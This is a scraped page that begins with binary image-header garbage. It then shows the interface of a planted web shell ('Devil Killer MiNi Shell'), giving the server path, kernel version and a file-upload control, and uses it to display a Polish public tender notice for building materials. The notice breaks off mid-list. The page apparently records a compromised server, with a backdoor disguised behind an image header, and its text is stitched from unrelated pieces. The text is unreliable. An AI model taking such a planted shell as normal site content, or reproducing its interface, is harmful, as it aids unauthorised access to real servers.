JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190712/573060-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 573060-N-2019 z dnia 2019-07-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Dom Pomocy Społecznej w Klisinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">SUKCESYWNA DOSTAWA MATERIAŁÓW BUDOWLANYCH DLA DOMU POMOCY SPOŁECZNEJ W KLISINIE I PODLEGŁYCH ZAKŁADÓW /GŁUBCZYCE, RADYNIA, BOBOLUSZKI, DZBAŃCE, BRANICE, KIETRZ I BLISZCZYCE/ W OKRESIE DO 31 GRUDNIA 2019 R.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Dom Pomocy Społecznej w Klisinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">29337300000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Klisino</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">100</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">48-118</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Lisięcice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">opolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">774 857 593</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dps_klisino@poczta.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">774 857 594</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.dps-klisino.pl, www.bip.dps.powiatglubczycki.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.dps-klisino.pl, www.bip.dps.powiatglubczycki.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.dps-klisino.pl, www.bip.dps.powiatglubczycki.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">wymagane jest złożenie ofert w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">DOM POMOCY SPOŁECZNEJ W KLISINIE KLISINO 100 48-118 LISIĘCICE BUDYNEK ADMINISTRACJI pokój nr 1 - SEKRETARIAT do dnia 22.07.2019r. do godz. 08.45</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">SUKCESYWNA DOSTAWA MATERIAŁÓW BUDOWLANYCH DLA DOMU POMOCY SPOŁECZNEJ W KLISINIE I PODLEGŁYCH ZAKŁADÓW /GŁUBCZYCE, RADYNIA, BOBOLUSZKI, DZBAŃCE, BRANICE, KIETRZ I BLISZCZYCE/ W OKRESIE DO 31 GRUDNIA 2019 R.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">10/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest sukcesywna dostawa materialów budowlanych dla Domu Pomocy Społecznej w Klisinie i podległych zakładów (Głubczyce, Radynia, Boboluszki, Dzbańce, Branice, Kietrz i Bliszczyce) w okresie do 31.12.2019 r.(CPV 44111000-1) materiały budowlane, (CPV 44190000-8) różne materiały budowlane, ORIENTACYJNE ZAPOTRZEBOWANIE NA OKRES DO 31.12.2019r.L.p	Nazwa	Jedn. miary	Ilość 1. Śruby stalowe zgrubne z łbem sześciokątnym z gwintem na całej długości z nakrętkami i podkładkami MB o długości do 50mm`	kg	32. Taśma izolacyjna 3x50 mm do otulin	m	953. Klipsy montażowe Klipsy ułatwiające montaż krawędzi otulin izolacyjnych	szt.	49084. Otuliny FRZ (czerwone) do rur PP przeznaczone do izolowania ciepła rurociągów i urządzeń instalacyjnych. gr. 20mm	m	8995. Uchwyt do rurociągów z tworzyw sztucznych o śr. Zewnętrznej 20 mm	szt.	1536. Uchwyt do rurociągów z tworzyw sztucznych o śr. Zewnętrznej 25 mm	szt.	897. Uchwyt do rurociągów z tworzyw sztucznych o śr. Zewnętrznej 32 mm	szt.	738. Uchwyt do rurociągów z tworzyw sztucznych o śr. Zewnętrznej 40 mm	szt.	289. Uchwyt do rurociągów z PVC o śr. 50 mm	szt.	1910. Uchwyt do rurociągów z PVC o śr. 110 mm	szt.	911. Uszczelki z gumy do przewodów wentylacyjnych kołowych o śr do 200 mm	szt.	1412. Podpory kanałów (przewodów) wentylacyjnych typ C o śr. Do 200mm	szt.	213. Nagrzewnica Elektryczna kanałowa przystosowana do montażu bezpośrednio w okrągłych kanałach wentylacyjnych o standardowych średnicach (100-400 mm). Obudowa nagrzewnic wykonana jest z ocynkowanej blachy stalowej, elementy grzewcze ze stali nierdzewnej podwójny układ zabezpieczenia przed przegrzaniem: automatyczny (temp. +75°C)z odblokowaniem ręcznym (temp. +85°C)Średnica kanału - 125Współczynnik mocy: 0,9 x 1000 = 900WRodzaj zasilania: S - 1 x 230V	szt.	114. Wentylator kanałowy Wentylator przeznaczony do wszelkiego rodzaju instalacji wentylacji ogólnej.Typowe zastosowania to: wentylacja wywiewna i nawiewna mieszkań, biur, sklepów, lokali gastronomicznych, współpraca z domowymi okapami kuchennymi wyposażonymi w filtry przeciwtłuszczowe.-maksymalna wydajność Qmax 470 m3/h -ciśnienie statyczne Ps 230 Pa - napięcie U 230 V - moc P 44 W -natężenie prądu Imax 0.19 A - prędkość obrotowa nmax 2150 obr/min - temperatura pracy t -20 - 60 °C - ciśnienie akustyczne LWA 33 dB(A) - masa m 2.7 kg - przekrój ? 160mm	szt.	115. Filtr kanałowyFiltr kanałowy przystosowane do montażu w okrągłych kanałach wentylacyjnych o standardowych średnicach (100-400 mm). Służą do wstępnej filtracji nawiewanego powietrza.Średnica nominalna kanału - 100	szt	116. Wentylator do pomieszczeń małej i średniej wielkości (mocowania antywibracyjne silnika) charakteryzują się niskim poziomem ciśnienia akustycznego. wykonany z tworzywa sztucznego formowanego wtryskowomocowania antywibracyjne silnikaklapa zwrotna w standardzielampka kontrolna w standardziemaksymalna temperatura medium +40°Csilnik asynchroniczny, jednofazowy, 230V 50Hz, (dostępna wersja 12V)silnik bezszczotkowy klasa izolacji Bzabezpieczenie przed porażeniem prądem w klasie II (klasa III w wersji 12V)stopień ochrony IP45 (IP57 w wersji 12V)przystosowany do regulacji napięciowej (model 300 oraz 300 PLUS)	szt.	117. Czerpnie powietrza ścienne kołowe typ B o śr. Do 315 mm	szt.	118. Anemostaty kołowe typ D o śr. Do 160 mm	szt.	219. Kształtki wentylacyjne kołowe typ S z blachy stalowej ocynkowanej o śr. Do 200mm (kolana -według potrzeb zamawiającego)	m2	220. Przewody (prostki) wentylacyjne kołowe typ S (Spiro) z blachy stalowej ocynkowanej o śr. Do 200 mm m2	321. Kształtki przejściowe redukcyjne mosiężne 10x1/2``	szt.	5922. Wspornik do umywalek porcelanowych	szt.	923. Umywalki prostokątne lub trapezowe porcelanowe 50 cm kolor białyGat.I	szt.	924. Odwodnienie liniowe L=0,8m wewnętrzne niskie, stal nierdzewna	szt.	925. Sedesy samo opadające (kompatybilny z poz 27).	szt.	926. Przycisk do spłuczek podtynkowych publicznych ciśnieniowy (kompatybilny z poz.31)	szt.	927. Miski ustępowe porcelanowe zawieszane.Wykonana z ceramiki sanitarnej ,zapewniająca szybki i dokładne czyszczenie, strumień wody musi dokładnie opłukać całą misę bez rozpryskiwania	szt.	928. Pochwyt dla osób niepełnosprawnych 40cm łamany lewe i prawe z trwałą powłoką antykorozyjną	szt.	929. Kotara z uchwytem uniwersalna Wysokiej jakości, wodoodporna z tkaniny poliestrowej, łatwa w utrzymaniu czystości	szt.	930. Wsporniki dystansowe do elementów misy ustępowej kpl.	931. Element montażowy do miski ustępowej (kompatybilny z poz. 27)	kpl.	932. Zlewozmywaki ze stali nierdzewnej` jedno komorowy z ,,półką", 60x80	szt.	133. Tarczki ochronne/ maskujące rozety śr. Od 20-25mmm	szt.	3434. Złączki mosiężne do grzejników o śr. Zew. 15 mm	szt.	3435. Grzejnik konwektorowy dolnozaworowy 3 płytowyWymiary: wysokość 600 x szerokość 1400 Moc 1643 W 55/45/20°C	szt.	236. Grzejnik konwektorowy dolnozaworowy 2 płytowy Wymiary: wysokość 600 x szerokość 1400 Moc 1200W 55/45/20°C	szt.	437. Grzejnik konwektorowy dolnozaworowy 2 płytowyWymiary: wysokość 600 x szerokość 1200 Moc 1028 W 55/45/20 stop	szt.	438. Grzejnik konwektorowy dolnozaworowy 2 płytowyWymiary: wysokość 600 x szerokość 1100 Moc 943 W 55/45/20°C	szt.	439. Grzejnik z blachy stalowej 3-płytowy lakierowany, dł. 800mm wys. 600 dolnozaworowyMoc 939W 55/45/20°C	szt.	240. Grzejnik z blachy stalowej lakierowany, , 2płytowy dł. 800mm wys. 600mm; Moc 685W 55/45/20°C	szt.	1241. Rozety pojedyncze tłoczone z blachy chromowane do rur miedzianych 15 mm	szt.	5642. Zawory grzejnikowe termostatyczne do w/w grzejników z głowicami termostatycznymi 15 mm	szt.	2843. Zawory odpowietrzające automatyczne o śr. 15 mm	szt.	444. Zawory grzejnikowe powrotne (portki) proste lub kątowe 15 mm	szt.	2845. Zawory zwrotne przelotowe mosiężne śr. 15 mm	szt.	446. Zawory przelotowe proste mosiężne o śr. Nominalnej 40 mm	szt.	247. Syfony umywalkowe mosiężne ze spustem i rurą odpływową śr. 32mm(Kompatybilne z poz.23)	szt.	948. Bateria natryskowa bezdotykowa mosiężna , średnica 15mm, wykończenie chrom, regulator termostatyczny ,Napięcie 230 v	szt.	949. Bateria umywalkowa bezdotykowa stojąca - DN 15- montaż jednootworowy- przepływ 1,9 l/min- perlator kaskadowy M 24 x 1- uchwyt regulacji temperatury, zawór głowicy- optyczny czujnik ruchu- moduł elektroniczny- zasilanie 230V- zasilacz z kablem o długości 70 cm- zawory zwrotne- sitko wychwytujące zanieczyszczenia- system szybkiego montażu, wandaloodporna- elastyczne wężyki ciśnieniowe G 3/8- oszczędność wody do 40%- chromW komplecie z baterią wężyki podłączeniowe(uwaga: kompatybilna z poz. 23 umywalka porcelanowa)	szt.	950. Bateria zlewozmywakowa stojąca mosiężna śr. 15 mm szt.	151. Złącza elastyczne z tworzywa sztucznego o śr. Zewnętrznej 20 mm	szt.	952. Zawory kulowe przelotowe, mosiężne do wody, do 100 st. C 15 mm  1/2 , 3/4	szt.	2453. Kształtki z rur PE z gwintem zewnętrznym i wewnętrznym 1/2 o śr. 20 mm (90°, i proste)	szt.	20254. Kształtki z rur PE z gwintem o śr. 25 mm (trójniki, kolana 90°, mufa)	szt.	5255. Kształtki z rur PE z gwintem o śr. 32 mm (trójniki, kolana 90°, mufa)	szt.	4956. Kształtki z polipropylenu o śr. Zewnętrznej 20 mm PP (90°, 67°, trójnik, mufa) gwint zewnętrzny i gwint wewnętrzny	szt.	14257. Kształtki z polipropylenu o śr. Zewnętrznej 25 mm PP(90°, 67°, trójnik, mufa) gwint zewnętrzny i gwint wewnętrzny	szt.	4758. Kształtki z polipropylenu o śr. Zewnętrznej 32 mm PP (90°, 67°, trójnik, mufa) gwint zewnętrzny i gwint wewnętrzny	szt.	4059. Kształtki z polipropylenu o śr. Zewnętrznej 25 mm PP(90°, 67°, trójnik, mufa) gwint zewnętrzny i gwint wewnętrzny	szt.	20460. Kształtki z polipropylenu o śr. Zewnętrznej 40 mm PP(90°, 67°, trójnik, mufa) gwint zewnętrzny i gwint wewnętrzny	szt.	1361. Rury PE o śr. 25 mm	m	6062. Rury PE o śr. 32 mm	m	6263. Kształtki z polietylenu (gwintowane) o śr. Zewnętrznej 20 mm PP	szt.	964. Kształtki kanalizacyjne z PVC o śr. 50 mm (90°, 67°,45° trójnik)	szt.	5765. Kształtki kanalizacyjne z PVC o śr. 110 mm (90°, 67°,45° trójnik)	szt.	2766. Rury z polipropylenu o śr. Zewnętrznej 20 mm PP do wysokich temperatur ciepłej wody	m	31267. Rury z polipropylenu o śr. Zewnętrznej 25 mm PP do wysokich temperatur ciepłej wody	m	7768. Rury z polipropylenu o śr. Zewnętrznej 32 mm PP do wysokich temperatur ciepłej wody	m	7169. Rury z polipropylenu o śr. Zewnętrznej 40 mm PP do wysokich temperatur ciepłej wody	m	3070. Korki zaślepki do rur kanalizacyjnych pcv śr. 110mm Szt.	971. Korki zaślepki do rur kanalizacyjnych pcv śr. 50mm	szt.	1072. Łącznik /mufa pcv 110mm	szt.	273. Rury stalowe instalacyjne z/s typ S średnie ocynk. Z końcami gwint 32 mm	m	474. Płytki ścienne gatunek I 25x40 cm kolor do uzgodnienia z zamawiającym (delikatne ecru) posiadające atest higieniczny, grubość płytki 8mm, przeznaczenie łazienka,Odporność na ogień A1	m2	14675. Płytki z kamieni sztucznych gat I kolor kamień naturalny 30x30x cm, min R10,	m2	1076. Zaprawa do spoinowania grub. od 1 do 6 mm, grupa I. opak. 5 kg, wysoka odporność mechaniczna na częste mycie, szorowanie i ścieranie, posiadająca dużą przyczepność do brzegów płytek-grubość spoiny: 1 - 6 mm-temperatura stosowania: od +5 °C do + 25 °C-czas gotowości do pracy: ok. 2 h-ruch pieszy: po ok. 24 h-pełne obciążenie po ok. 24 hGęstość nasypowa (suchej mieszanki) ok. 1,15 kg/dm?. Gęstość objętościowa masy (po wymieszaniu) ok. 1,80 kg/dm?. Gęstość w stanie suchym (po związaniu) ok. 1,65 kg/dm?. Proporcje mieszania woda / sucha mieszanka 0,28-0,29 l / 1kg 0,56-0,58 l/ 2kg1,4-1,45 l/ 5kg Min/max szerokość spoiny1 mm - 6 mm. Temperatura przygotowania zaprawy oraz podłoża i otoczenia w trakcie stosowania od +5 °C do +25 °C. Czas dojrzewania ok. 5 min. Czas gotowości zaprawy do pracy ok. 2 godziny. Czyszczenie okładziny po zafugowaniupo 10-30 min. Ruch pieszypo ok. 24 h. Pełne obciążenie po ok. 24 h	kg	7677. Podkładki amortyzacyjne z płyty gumowej o gr. 5 mm	szt.	278. Zaprawa 